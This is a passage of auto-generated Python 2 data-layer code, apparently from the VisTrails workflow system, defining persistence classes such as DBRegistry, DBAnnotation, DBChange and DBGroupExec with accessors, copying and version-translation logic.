self.is_dirty = True
found = False
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
self._db_annotations[i] = annotation
found = True
break
if not found:
self._db_annotations.append(annotation)
self.db_annotations_id_index[annotation.db_id] = annotation
def db_delete_annotation(self, annotation):
self.is_dirty = True
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == annotation.db_id:
if not self._db_annotations[i].is_new:
self.db_deleted_annotations.append(self._db_annotations[i])
del self._db_annotations[i]
break
del self.db_annotations_id_index[annotation.db_id]
def db_get_annotation(self, key):
for i in xrange(len(self._db_annotations)):
if self._db_annotations[i].db_id == key:
return self._db_annotations[i]
return None
def db_get_annotation_by_id(self, key):
return self.db_annotations_id_index[key]
def db_has_annotation_with_id(self, key):
return key in self.db_annotations_id_index
def __get_db_plugin_datas(self):
return self._db_plugin_datas
def __set_db_plugin_datas(self, plugin_datas):
self._db_plugin_datas = plugin_datas
self.is_dirty = True
db_plugin_datas = property(__get_db_plugin_datas, __set_db_plugin_datas)
def db_get_plugin_datas(self):
return self._db_plugin_datas
def db_add_plugin_data(self, plugin_data):
self.is_dirty = True
self._db_plugin_datas.append(plugin_data)
self.db_plugin_datas_id_index[plugin_data.db_id] = plugin_data
def db_change_plugin_data(self, plugin_data):
self.is_dirty = True
found = False
for i in xrange(len(self._db_plugin_datas)):
if self._db_plugin_datas[i].db_id == plugin_data.db_id:
self._db_plugin_datas[i] = plugin_data
found = True
break
if not found:
self._db_plugin_datas.append(plugin_data)
self.db_plugin_datas_id_index[plugin_data.db_id] = plugin_data
def db_delete_plugin_data(self, plugin_data):
self.is_dirty = True
for i in xrange(len(self._db_plugin_datas)):
if self._db_plugin_datas[i].db_id == plugin_data.db_id:
if not self._db_plugin_datas[i].is_new:
self.db_deleted_plugin_datas.append(self._db_plugin_datas[i])
del self._db_plugin_datas[i]
break
del self.db_plugin_datas_id_index[plugin_data.db_id]
def db_get_plugin_data(self, key):
for i in xrange(len(self._db_plugin_datas)):
if self._db_plugin_datas[i].db_id == key:
return self._db_plugin_datas[i]
return None
def db_get_plugin_data_by_id(self, key):
return self.db_plugin_datas_id_index[key]
def db_has_plugin_data_with_id(self, key):
return key in self.db_plugin_datas_id_index
def __get_db_others(self):
return self._db_others
def __set_db_others(self, others):
self._db_others = others
self.is_dirty = True
db_others = property(__get_db_others, __set_db_others)
def db_get_others(self):
return self._db_others
def db_add_other(self, other):
self.is_dirty = True
self._db_others.append(other)
self.db_others_id_index[other.db_id] = other
def db_change_other(self, other):
self.is_dirty = True
found = False
for i in xrange(len(self._db_others)):
if self._db_others[i].db_id == other.db_id:
self._db_others[i] = other
found = True
break
if not found:
self._db_others.append(other)
self.db_others_id_index[other.db_id] = other
def db_delete_other(self, other):
self.is_dirty = True
for i in xrange(len(self._db_others)):
if self._db_others[i].db_id == other.db_id:
if not self._db_others[i].is_new:
self.db_deleted_others.append(self._db_others[i])
del self._db_others[i]
break
del self.db_others_id_index[other.db_id]
def db_get_other(self, key):
for i in xrange(len(self._db_others)):
if self._db_others[i].db_id == key:
return self._db_others[i]
return None
def db_get_other_by_id(self, key):
return self.db_others_id_index[key]
def db_has_other_with_id(self, key):
return key in self.db_others_id_index
def __get_db_vistrail_id(self):
return self._db_vistrail_id
def __set_db_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
self.is_dirty = True
db_vistrail_id = property(__get_db_vistrail_id, __set_db_vistrail_id)
def db_add_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_change_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_delete_vistrail_id(self, vistrail_id):
self._db_vistrail_id = None
def getPrimaryKey(self):
return self._db_id
class DBRegistry(object):
vtType = 'registry'
def __init__(self, id=None, entity_type=None, version=None, root_descriptor_id=None, name=None, last_modified=None, packages=None):
self._db_id = id
self._db_entity_type = entity_type
self._db_version = version
self._db_root_descriptor_id = root_descriptor_id
self._db_name = name
self._db_last_modified = last_modified
self.db_deleted_packages = []
self.db_packages_id_index = {}
self.db_packages_identifier_index = {}
if packages is None:
self._db_packages = []
else:
self._db_packages = packages
for v in self._db_packages:
self.db_packages_id_index[v.db_id] = v
self.db_packages_identifier_index[(v.db_identifier,v.db_version)] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBRegistry.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBRegistry(id=self._db_id,
entity_type=self._db_entity_type,
version=self._db_version,
root_descriptor_id=self._db_root_descriptor_id,
name=self._db_name,
last_modified=self._db_last_modified)
if self._db_packages is None:
cp._db_packages = []
else:
cp._db_packages = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_packages]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_root_descriptor_id') and ('module_descriptor', self._db_root_descriptor_id) in id_remap:
cp._db_root_descriptor_id = id_remap[('module_descriptor', self._db_root_descriptor_id)]
# recreate indices and set flags
cp.db_packages_id_index = dict((v.db_id, v) for v in cp._db_packages)
cp.db_packages_identifier_index = dict(((v.db_identifier,v.db_version), v) for v in cp._db_packages)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBRegistry()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'root_descriptor_id' in class_dict:
res = class_dict['root_descriptor_id'](old_obj, trans_dict)
new_obj.db_root_descriptor_id = res
elif hasattr(old_obj, 'db_root_descriptor_id') and old_obj.db_root_descriptor_id is not None:
new_obj.db_root_descriptor_id = old_obj.db_root_descriptor_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'packages' in class_dict:
res = class_dict['packages'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_package(obj)
elif hasattr(old_obj, 'db_packages') and old_obj.db_packages is not None:
for obj in old_obj.db_packages:
new_obj.db_add_package(DBPackage.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_packages') and hasattr(new_obj, 'db_deleted_packages'):
for obj in old_obj.db_deleted_packages:
n_obj = DBPackage.update_version(obj, trans_dict)
new_obj.db_deleted_packages.append(n_obj)
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_packages:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_package(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_packages)
if remove:
self.db_deleted_packages = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_packages:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_root_descriptor_id(self):
return self._db_root_descriptor_id
def __set_db_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = root_descriptor_id
self.is_dirty = True
db_root_descriptor_id = property(__get_db_root_descriptor_id, __set_db_root_descriptor_id)
def db_add_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = root_descriptor_id
def db_change_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = root_descriptor_id
def db_delete_root_descriptor_id(self, root_descriptor_id):
self._db_root_descriptor_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_packages(self):
return self._db_packages
def __set_db_packages(self, packages):
self._db_packages = packages
self.is_dirty = True
db_packages = property(__get_db_packages, __set_db_packages)
def db_get_packages(self):
return self._db_packages
def db_add_package(self, package):
self.is_dirty = True
self._db_packages.append(package)
self.db_packages_id_index[package.db_id] = package
self.db_packages_identifier_index[(package.db_identifier,package.db_version)] = package
def db_change_package(self, package):
self.is_dirty = True
found = False
for i in xrange(len(self._db_packages)):
if self._db_packages[i].db_id == package.db_id:
self._db_packages[i] = package
found = True
break
if not found:
self._db_packages.append(package)
self.db_packages_id_index[package.db_id] = package
self.db_packages_identifier_index[(package.db_identifier,package.db_version)] = package
def db_delete_package(self, package):
self.is_dirty = True
for i in xrange(len(self._db_packages)):
if self._db_packages[i].db_id == package.db_id:
if not self._db_packages[i].is_new:
self.db_deleted_packages.append(self._db_packages[i])
del self._db_packages[i]
break
del self.db_packages_id_index[package.db_id]
del self.db_packages_identifier_index[(package.db_identifier,package.db_version)]
def db_get_package(self, key):
for i in xrange(len(self._db_packages)):
if self._db_packages[i].db_id == key:
return self._db_packages[i]
return None
def db_get_package_by_id(self, key):
return self.db_packages_id_index[key]
def db_has_package_with_id(self, key):
return key in self.db_packages_id_index
def db_get_package_by_identifier(self, key):
return self.db_packages_identifier_index[key]
def db_has_package_with_identifier(self, key):
return key in self.db_packages_identifier_index
def getPrimaryKey(self):
return self._db_id
class DBAnnotation(object):
vtType = 'annotation'
def __init__(self, id=None, key=None, value=None):
self._db_id = id
self._db_key = key
self._db_value = value
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAnnotation.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAnnotation(id=self._db_id,
key=self._db_key,
value=self._db_value)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAnnotation()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'key' in class_dict:
res = class_dict['key'](old_obj, trans_dict)
new_obj.db_key = res
elif hasattr(old_obj, 'db_key') and old_obj.db_key is not None:
new_obj.db_key = old_obj.db_key
if 'value' in class_dict:
res = class_dict['value'](old_obj, trans_dict)
new_obj.db_value = res
elif hasattr(old_obj, 'db_value') and old_obj.db_value is not None:
new_obj.db_value = old_obj.db_value
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_key(self):
return self._db_key
def __set_db_key(self, key):
self._db_key = key
self.is_dirty = True
db_key = property(__get_db_key, __set_db_key)
def db_add_key(self, key):
self._db_key = key
def db_change_key(self, key):
self._db_key = key
def db_delete_key(self, key):
self._db_key = None
def __get_db_value(self):
return self._db_value
def __set_db_value(self, value):
self._db_value = value
self.is_dirty = True
db_value = property(__get_db_value, __set_db_value)
def db_add_value(self, value):
self._db_value = value
def db_change_value(self, value):
self._db_value = value
def db_delete_value(self, value):
self._db_value = None
def getPrimaryKey(self):
return self._db_id
class DBChange(object):
vtType = 'change'
def __init__(self, data=None, id=None, what=None, oldObjId=None, newObjId=None, parentObjId=None, parentObjType=None):
self.db_deleted_data = []
self._db_data = data
self._db_id = id
self._db_what = what
self._db_oldObjId = oldObjId
self._db_newObjId = newObjId
self._db_parentObjId = parentObjId
self._db_parentObjType = parentObjType
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBChange.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBChange(id=self._db_id,
what=self._db_what,
oldObjId=self._db_oldObjId,
newObjId=self._db_newObjId,
parentObjId=self._db_parentObjId,
parentObjType=self._db_parentObjType)
if self._db_data is not None:
cp._db_data = self._db_data.do_copy(new_ids, id_scope, id_remap)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_oldObjId') and (self._db_what, self._db_oldObjId) in id_remap:
cp._db_oldObjId = id_remap[(self._db_what, self._db_oldObjId)]
if hasattr(self, 'db_newObjId') and (self._db_what, self._db_newObjId) in id_remap:
cp._db_newObjId = id_remap[(self._db_what, self._db_newObjId)]
if hasattr(self, 'db_parentObjId') and (self._db_parentObjType, self._db_parentObjId) in id_remap:
cp._db_parentObjId = id_remap[(self._db_parentObjType, self._db_parentObjId)]
# recreate indices and set flags
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBChange()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'data' in class_dict:
res = class_dict['data'](old_obj, trans_dict)
new_obj.db_data = res
elif hasattr(old_obj, 'db_data') and old_obj.db_data is not None:
obj = old_obj.db_data
if obj.vtType == 'module':
new_obj.db_add_data(DBModule.update_version(obj, trans_dict))
elif obj.vtType == 'location':
new_obj.db_add_data(DBLocation.update_version(obj, trans_dict))
elif obj.vtType == 'annotation':
new_obj.db_add_data(DBAnnotation.update_version(obj, trans_dict))
elif obj.vtType == 'function':
new_obj.db_add_data(DBFunction.update_version(obj, trans_dict))
elif obj.vtType == 'connection':
new_obj.db_add_data(DBConnection.update_version(obj, trans_dict))
elif obj.vtType == 'port':
new_obj.db_add_data(DBPort.update_version(obj, trans_dict))
elif obj.vtType == 'parameter':
new_obj.db_add_data(DBParameter.update_version(obj, trans_dict))
elif obj.vtType == 'portSpec':
new_obj.db_add_data(DBPortSpec.update_version(obj, trans_dict))
elif obj.vtType == 'abstraction':
new_obj.db_add_data(DBAbstraction.update_version(obj, trans_dict))
elif obj.vtType == 'group':
new_obj.db_add_data(DBGroup.update_version(obj, trans_dict))
elif obj.vtType == 'other':
new_obj.db_add_data(DBOther.update_version(obj, trans_dict))
elif obj.vtType == 'plugin_data':
new_obj.db_add_data(DBPluginData.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_data') and hasattr(new_obj, 'db_deleted_data'):
for obj in old_obj.db_deleted_data:
if obj.vtType == 'module':
n_obj = DBModule.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'location':
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'annotation':
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'function':
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'connection':
n_obj = DBConnection.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'port':
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'parameter':
n_obj = DBParameter.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'portSpec':
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'abstraction':
n_obj = DBAbstraction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'group':
n_obj = DBGroup.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'other':
n_obj = DBOther.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'plugin_data':
n_obj = DBPluginData.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'what' in class_dict:
res = class_dict['what'](old_obj, trans_dict)
new_obj.db_what = res
elif hasattr(old_obj, 'db_what') and old_obj.db_what is not None:
new_obj.db_what = old_obj.db_what
if 'oldObjId' in class_dict:
res = class_dict['oldObjId'](old_obj, trans_dict)
new_obj.db_oldObjId = res
elif hasattr(old_obj, 'db_oldObjId') and old_obj.db_oldObjId is not None:
new_obj.db_oldObjId = old_obj.db_oldObjId
if 'newObjId' in class_dict:
res = class_dict['newObjId'](old_obj, trans_dict)
new_obj.db_newObjId = res
elif hasattr(old_obj, 'db_newObjId') and old_obj.db_newObjId is not None:
new_obj.db_newObjId = old_obj.db_newObjId
if 'parentObjId' in class_dict:
res = class_dict['parentObjId'](old_obj, trans_dict)
new_obj.db_parentObjId = res
elif hasattr(old_obj, 'db_parentObjId') and old_obj.db_parentObjId is not None:
new_obj.db_parentObjId = old_obj.db_parentObjId
if 'parentObjType' in class_dict:
res = class_dict['parentObjType'](old_obj, trans_dict)
new_obj.db_parentObjType = res
elif hasattr(old_obj, 'db_parentObjType') and old_obj.db_parentObjType is not None:
new_obj.db_parentObjType = old_obj.db_parentObjType
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_data is not None:
children.extend(self._db_data.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_data = None
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_data)
if remove:
self.db_deleted_data = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_data is not None and self._db_data.has_changes():
return True
return False
def __get_db_data(self):
return self._db_data
def __set_db_data(self, data):
self._db_data = data
self.is_dirty = True
db_data = property(__get_db_data, __set_db_data)
def db_add_data(self, data):
self._db_data = data
def db_change_data(self, data):
self._db_data = data
def db_delete_data(self, data):
if not self.is_new:
self.db_deleted_data.append(self._db_data)
self._db_data = None
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_what(self):
return self._db_what
def __set_db_what(self, what):
self._db_what = what
self.is_dirty = True
db_what = property(__get_db_what, __set_db_what)
def db_add_what(self, what):
self._db_what = what
def db_change_what(self, what):
self._db_what = what
def db_delete_what(self, what):
self._db_what = None
def __get_db_oldObjId(self):
return self._db_oldObjId
def __set_db_oldObjId(self, oldObjId):
self._db_oldObjId = oldObjId
self.is_dirty = True
db_oldObjId = property(__get_db_oldObjId, __set_db_oldObjId)
def db_add_oldObjId(self, oldObjId):
self._db_oldObjId = oldObjId
def db_change_oldObjId(self, oldObjId):
self._db_oldObjId = oldObjId
def db_delete_oldObjId(self, oldObjId):
self._db_oldObjId = None
def __get_db_newObjId(self):
return self._db_newObjId
def __set_db_newObjId(self, newObjId):
self._db_newObjId = newObjId
self.is_dirty = True
db_newObjId = property(__get_db_newObjId, __set_db_newObjId)
def db_add_newObjId(self, newObjId):
self._db_newObjId = newObjId
def db_change_newObjId(self, newObjId):
self._db_newObjId = newObjId
def db_delete_newObjId(self, newObjId):
self._db_newObjId = None
def __get_db_parentObjId(self):
return self._db_parentObjId
def __set_db_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
self.is_dirty = True
db_parentObjId = property(__get_db_parentObjId, __set_db_parentObjId)
def db_add_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_change_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_delete_parentObjId(self, parentObjId):
self._db_parentObjId = None
def __get_db_parentObjType(self):
return self._db_parentObjType
def __set_db_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
self.is_dirty = True
db_parentObjType = property(__get_db_parentObjType, __set_db_parentObjType)
def db_add_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_change_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_delete_parentObjType(self, parentObjType):
self._db_parentObjType = None
def getPrimaryKey(self):
return self._db_id
class DBGroupExec(object):
vtType = 'group_exec'
def __init__(self, id=None, ts_start=None, ts_end=None, cached=None, module_id=None, group_name=None, group_type=None, completed=None, error=None, machine_id=None, annotations=None, loop_execs=None, module_execs=None, group_execs=None):
self._db_id = id
self._db_ts_start = ts_start
self._db_ts_end = ts_end
self._db_cached = cached
self._db_module_id = module_id
self._db_group_name = group_name
self._db_group_type = group_type
self._db_completed = completed
self._db_error = error
self._db_machine_id = machine_id
self.db_deleted_annotations = []
self.db_annotations_id_index = {}
if annotations is None:
self._db_annotations = []
else:
self._db_annotations = annotations
for v in self._db_annotations:
self.db_annotations_id_index[v.db_id] = v
self.db_deleted_loop_execs = []
self.db_loop_execs_id_index = {}
if loop_execs is None:
self._db_loop_execs = []
else:
self._db_loop_execs = loop_execs
for v in self._db_loop_execs:
self.db_loop_execs_id_index[v.db_id] = v
self.db_deleted_module_execs = []
self.db_module_execs_id_index = {}
if module_execs is None:
self._db_module_execs = []
else:
self._db_module_execs = module_execs
for v in self._db_module_execs:
self.db_module_execs_id_index[v.db_id] = v
self.db_deleted_group_execs = []
self.db_group_execs_id_index = {}
if group_execs is None:
self._db_group_execs = []
else:
self._db_group_execs = group_execs
for v in self._db_group_execs:
self.db_group_execs_id_index[v.db_id] = v
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBGroupExec.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBGroupExec(id=self._db_id,
ts_start=self._db_ts_start,
ts_end=self._db_ts_end,
cached=self._db_cached,
module_id=self._db_module_id,
group_name=self._db_group_name,
group_type=self._db_group_type,
completed=self._db_completed,
error=self._db_error,
machine_id=self._db_machine_id)
if self._db_annotations is None:
cp._db_annotations = []
else:
cp._db_annotations = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_annotations]
if self._db_loop_execs is None:
cp._db_loop_execs = []
else:
cp._db_loop_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_loop_execs]
if self._db_module_execs is None:
cp._db_module_execs = []
else:
cp._db_module_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_module_execs]
if self._db_group_execs is None:
cp._db_group_execs = []
else:
cp._db_group_execs = [v.do_copy(new_ids, id_scope, id_remap) for v in self._db_group_execs]
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_module_id') and ('module', self._db_module_id) in id_remap:
cp._db_module_id = id_remap[('module', self._db_module_id)]
if hasattr(self, 'db_machine_id') and ('machine', self._db_machine_id) in id_remap:
cp._db_machine_id = id_remap[('machine', self._db_machine_id)]
# recreate indices and set flags
cp.db_annotations_id_index = dict((v.db_id, v) for v in cp._db_annotations)
cp.db_loop_execs_id_index = dict((v.db_id, v) for v in cp._db_loop_execs)
cp.db_module_execs_id_index = dict((v.db_id, v) for v in cp._db_module_execs)
cp.db_group_execs_id_index = dict((v.db_id, v) for v in cp._db_group_execs)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBGroupExec()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'ts_start' in class_dict:
res = class_dict['ts_start'](old_obj, trans_dict)
new_obj.db_ts_start = res
elif hasattr(old_obj, 'db_ts_start') and old_obj.db_ts_start is not None:
new_obj.db_ts_start = old_obj.db_ts_start
if 'ts_end' in class_dict:
res = class_dict['ts_end'](old_obj, trans_dict)
new_obj.db_ts_end = res
elif hasattr(old_obj, 'db_ts_end') and old_obj.db_ts_end is not None:
new_obj.db_ts_end = old_obj.db_ts_end
if 'cached' in class_dict:
res = class_dict['cached'](old_obj, trans_dict)
new_obj.db_cached = res
elif hasattr(old_obj, 'db_cached') and old_obj.db_cached is not None:
new_obj.db_cached = old_obj.db_cached
if 'module_id' in class_dict:
res = class_dict['module_id'](old_obj, trans_dict)
new_obj.db_module_id = res
elif hasattr(old_obj, 'db_module_id') and old_obj.db_module_id is not None:
new_obj.db_module_id = old_obj.db_module_id
if 'group_name' in class_dict:
res = class_dict['group_name'](old_obj, trans_dict)
new_obj.db_group_name = res
elif hasattr(old_obj, 'db_group_name') and old_obj.db_group_name is not None:
new_obj.db_group_name = old_obj.db_group_name
if 'group_type' in class_dict:
res = class_dict['group_type'](old_obj, trans_dict)
new_obj.db_group_type = res
elif hasattr(old_obj, 'db_group_type') and old_obj.db_group_type is not None:
new_obj.db_group_type = old_obj.db_group_type
if 'completed' in class_dict:
res = class_dict['completed'](old_obj, trans_dict)
new_obj.db_completed = res
elif hasattr(old_obj, 'db_completed') and old_obj.db_completed is not None:
new_obj.db_completed = old_obj.db_completed
if 'error' in class_dict:
res = class_dict['error'](old_obj, trans_dict)
new_obj.db_error = res
elif hasattr(old_obj, 'db_error') and old_obj.db_error is not None:
new_obj.db_error = old_obj.db_error
if 'machine_id' in class_dict:
res = class_dict['machine_id'](old_obj, trans_dict)
new_obj.db_machine_id = res
elif hasattr(old_obj, 'db_machine_id') and old_obj.db_machine_id is not None:
new_obj.db_machine_id = old_obj.db_machine_id
if 'annotations' in class_dict:
res = class_dict['annotations'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_annotation(obj)
elif hasattr(old_obj, 'db_annotations') and old_obj.db_annotations is not None:
for obj in old_obj.db_annotations:
new_obj.db_add_annotation(DBAnnotation.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_annotations') and hasattr(new_obj, 'db_deleted_annotations'):
for obj in old_obj.db_deleted_annotations:
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_annotations.append(n_obj)
if 'loop_execs' in class_dict:
res = class_dict['loop_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_loop_exec(obj)
elif hasattr(old_obj, 'db_loop_execs') and old_obj.db_loop_execs is not None:
for obj in old_obj.db_loop_execs:
new_obj.db_add_loop_exec(DBLoopExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_loop_execs') and hasattr(new_obj, 'db_deleted_loop_execs'):
for obj in old_obj.db_deleted_loop_execs:
n_obj = DBLoopExec.update_version(obj, trans_dict)
new_obj.db_deleted_loop_execs.append(n_obj)
if 'module_execs' in class_dict:
res = class_dict['module_execs'](old_obj, trans_dict)
